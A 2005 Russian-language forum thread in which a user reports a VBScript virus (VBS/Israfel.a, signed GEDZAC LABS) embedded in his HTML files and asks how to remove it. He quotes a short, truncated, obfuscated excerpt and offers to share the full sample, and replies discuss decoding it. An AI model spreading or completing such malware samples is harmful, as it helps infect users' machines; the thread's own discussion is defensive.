Кто чё-нить знает про зверя VBScript просю...

← →
ArchValentin © (2005-01-31 16:30) [0]

Доброго времени суток, господа прогеры, отдавал другу свой хард, смотрите какую интересную вещицу я обнаружил в html файлах...
Насколько мне позволяют мои знания HTML кода судить, это есть вирусняк.
Сам не запускал, но знаю что не Касперский, ни DrWeb его не обнаруживают, подскажите как помимо format c: можно вылечить?

А начинается он примерно так:
<Script Language="VBScript"> "<*****************************GEDZAC LABS 2004****************************> Rem VBS/Israfel.a un producto de <GEDZAC LABS> Rem USA aqui tienes un enemigo mбs, un grano de arena mбs en el desierto Rem Fk`ri"cnf"bbrr"wf`fuf"whu"vrbubu"cbdnukb"fk"jrich"dhjh"snbib"vrb"qnqnu+"~"btwbuh"btsfu"fvrn"wfuf"qbukh Rem Bk"tfrdb"tb"qf"tbdfich+"wbuh"kf"tbjnkkf"wbutntsb+"drfich"kf"snbuuf"tbf"kf"ncфibf"wfuf"wkfisfukf+"bk"tfrdb"`bujnifuж"~"of euж"hsuf"hwhusrincfc Rem Dhjh"cndb"erto="vrb"Cnht"ebicn`f"f"bbrr+"kh"qfi"f"ibdbtnsfu "<*************************************************************************> "<Nud)Ntufabk)f"99"@BC]FD"KFET"99"Cbcndfch"f"Fqunk"Kfqn`ib"=. "dsdw"6=(-=-=|")dsdwubwk~"#indl"("Udne6c7"{"na"/"f)..... Полностью выложить не получается, кому интересно обращайтесь, поделюсь...

← →
palva1 (2005-01-31 17:23) [1]

А почему вы думаете, что это вирус?

← →
BiN © (2005-01-31 17:24) [2]

http://www.microsoft.com/downloads/details.aspx?FamilyId=E7877F67-C447-4873-B1B0-21F0626A6329&displaylang=en

И декодеров также полно в нете

← →
вредитель (2005-01-31 17:24) [3]

если это зашифрованный вирусняк, где-то должна быть явная (возможно не очень понятная на первый взгляд функция расшифровки). Собсно можно выяснить только послерасшифровки (на таком принципе был основан знаменитый folder.htt-ед, после расшифровки выяснил много интересного о вирусах на VBS).

Кто чё-нить знает про зверя VBScript просю... Найти похожие ветки